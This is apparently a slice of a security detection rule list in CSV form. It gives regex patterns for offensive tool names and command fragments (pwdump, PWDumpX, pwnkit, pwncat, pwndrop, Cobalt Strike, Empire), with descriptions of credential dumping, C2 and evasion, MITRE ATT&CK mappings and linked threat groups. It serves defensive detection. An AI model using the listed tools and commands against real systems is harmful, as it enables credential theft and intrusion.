*",".{0,1000}pwdump\s\-f\s.{0,1000}","offensive_tool_keyword","PwDump8","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump8-8.2.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","55865" "*Pwdump v7.1 - raw password extractor*",".{0,1000}Pwdump\sv7\.1\s\-\sraw\spassword\sextractor.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. 
Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","55866" "*PwDump v8.2 - dumps windows password hashes*",".{0,1000}PwDump\sv8\.2\s\-\sdumps\swindows\spassword\shashes.{0,1000}","offensive_tool_keyword","PwDump8","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump8-8.2.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","55867" "*PWDump*",".{0,1000}PWDump\..{0,1000}","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1110.001 - T1555.003 - T1003.002","TA0006","N/A","menuPass - APT41 - Threat Group-3390 - APT1 - Turla - APT39 - FIN5","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55868" "*PWDump.*",".{0,1000}PWDump\..{0,1000}","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. 
This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1110.001 - T1555.003 - T1003.002","TA0006","N/A","menuPass - APT41 - Threat Group-3390 - APT1 - Turla - APT39 - FIN5","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55869" "*pwdump.exe*",".{0,1000}pwdump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55870" "*pwdump.py SYSTEM SAM*",".{0,1000}pwdump\.py\sSYSTEM\sSAM.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","55871" "*pwdump/cachedump*",".{0,1000}pwdump\/cachedump.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","N/A","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","55872" "*PwDump7.exe*",".{0,1000}PwDump7\.exe.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry 
hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","55874" "*PWDumpDLLPath*",".{0,1000}PWDumpDLLPath.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","55875" "*PWDumpEXEPath*",".{0,1000}PWDumpEXEPath.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","55876" "*-PWDumpFormat*",".{0,1000}\-PWDumpFormat.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55877" "*PWDumpX *",".{0,1000}PWDumpX\s.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","55879" "*PWDumpX v1.0*",".{0,1000}PWDumpX\sv1\.0.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","55880" "*PWDumpX.zip*",".{0,1000}PWDumpX\.zip.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","55881" "*PwDxOWaXzpP3j/eP8RpnnSf89H/76NEv+uk/3j/OmYrqMLj/ADpf*",".{0,1000}PwDxOWaXzpP3j\/eP8RpnnSf89H\/76NEv\+uk\/3j\/OmYrqMLj\/ADpf.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","55882" "*-PWHashes.txt*",".{0,1000}\-PWHashes\.txt.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","55883" "*pw-inspector -*",".{0,1000}pw\-inspector\s\-.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","55884" "*pw-inspector.*",".{0,1000}pw\-inspector\..{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","55885" "*pwn_jenkins*",".{0,1000}pwn_jenkins.{0,1000}","offensive_tool_keyword","pwn_jenkins","Remote Code Execution for jenkins","T1216 - T1210 - T1573","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gquere/pwn_jenkins","1","0","N/A","N/A","N/A","10","2049","336","2024-07-10T11:18:30Z","2018-07-18T14:24:27Z","55886" "*pwn1sher/CS-BOFs*",".{0,1000}pwn1sher\/CS\-BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","55887" "*pwn1sher/WMEye*",".{0,1000}pwn1sher\/WMEye.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","55888" "*pwn3d_label = Pwn3d!*",".{0,1000}pwn3d_label\s\=\sPwn3d!.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","55889" "*pwnagotchi*",".{0,1000}pwnagotchi.{0,1000}","offensive_tool_keyword","pwnagotchi","Pwnagotchi is an A2C-based AI leveraging bettercap that learns from its surrounding WiFi environment to maximize the crackable WPA key material it captures (either passively. or by performing authentication and association attacks). This material is collected as PCAP files containing any form of handshake supported by hashcat. including PMKIDs. full and half WPA handshakes","T1562.004 - T1040 - T1557.001","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/evilsocket/pwnagotchi","1","0","N/A","network exploitation tool","N/A","10","8267","1185","2025-03-31T09:38:00Z","2019-09-19T13:07:15Z","55890" "*pwnat.exe*",".{0,1000}pwnat\.exe.{0,1000}","offensive_tool_keyword","pwnat","pwnat. by Samy Kamkar. is a tool that allows any client behind a NAT to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. Simply put. this is a proxy server that works behind a NAT. 
even when the client is also behind a NAT","T1584 - T1571 - T1210.001","TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/samyk/pwnat","1","0","N/A","N/A","N/A","10","3546","493","2025-04-21T06:25:14Z","2012-08-10T05:55:11Z","55891" "*pwncat-cs *:*",".{0,1000}pwncat\-cs\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55892" "*pwncat-cs -lp *",".{0,1000}pwncat\-cs\s\-lp\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55893" "*pwncat-cs ssh://*",".{0,1000}pwncat\-cs\sssh\:\/\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55894" "*pwndb --target @* --output *",".{0,1000}pwndb\s\-\-target\s\@.{0,1000}\s\-\-output\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black 
Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55895" "*PwnDexter/SharpEDRChecker*",".{0,1000}PwnDexter\/SharpEDRChecker.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","55896" "*pwndrop install*",".{0,1000}pwndrop\sinstall.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","55897" "*pwndrop start*",".{0,1000}pwndrop\sstart.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","55898" "*pwndrop status*",".{0,1000}pwndrop\sstatus.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","55899" "*pwndrop 
stop*",".{0,1000}pwndrop\sstop.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","55900" "*pwndrop-linux-amd64*",".{0,1000}pwndrop\-linux\-amd64.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","#linux","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","55901" "*pwndrop-master*",".{0,1000}pwndrop\-master.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","55902" "*pwned_x64/notepad.exe*",".{0,1000}pwned_x64\/notepad\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","55903" "*Pwned-creds_Domainpasswordspray.txt*",".{0,1000}Pwned\-creds_Domainpasswordspray\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 
- T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","55904" "*pwned-passwords-ntlm*",".{0,1000}pwned\-passwords\-ntlm.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","55906" "*pwnkit ""id"" > .mad-root*",".{0,1000}pwnkit\s\""id\""\s\>\s\.mad\-root.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","55907" "*pwnkit ""useradd *",".{0,1000}pwnkit\s\""useradd\s.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","55908" "*pwnkit *",".{0,1000}pwnkit\s.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","N/A","1","93","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z","55909" "*pwnkit64decoded.c*",".{0,1000}pwnkit64decoded\.c.{0,1000}","offensive_tool_keyword","POC","exploitation of 
CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tool","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","N/A","1","96","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z","55910" "*pwnlook.exe *",".{0,1000}pwnlook\.exe\s.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","55911" "*pwnlook35.exe *",".{0,1000}pwnlook35\.exe\s.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","55912" "*pwnlook481.exe *",".{0,1000}pwnlook481\.exe\s.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","55913" "*pwnsauc3/RWXFinder*",".{0,1000}pwnsauc3\/RWXFinder.{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - 
TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","N/A","5","2","101","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z","55914" "*pwsafe2john.py*",".{0,1000}pwsafe2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","55916" "*pxethief *",".{0,1000}pxethief\s.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","0","N/A","N/A","N/A","4","368","57","2024-05-29T15:07:15Z","2022-08-12T22:16:46Z","55918" "*pxethief.py*",".{0,1000}pxethief\.py.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","N/A","4","368","57","2024-05-29T15:07:15Z","2022-08-12T22:16:46Z","55919" "*pxlib\bin\kerberos.x64.o*",".{0,1000}pxlib\\bin\\kerberos\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","55920" "*pycobalt.*",".{0,1000}pycobalt\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55932" "*pycobalt/aggressor*",".{0,1000}pycobalt\/aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
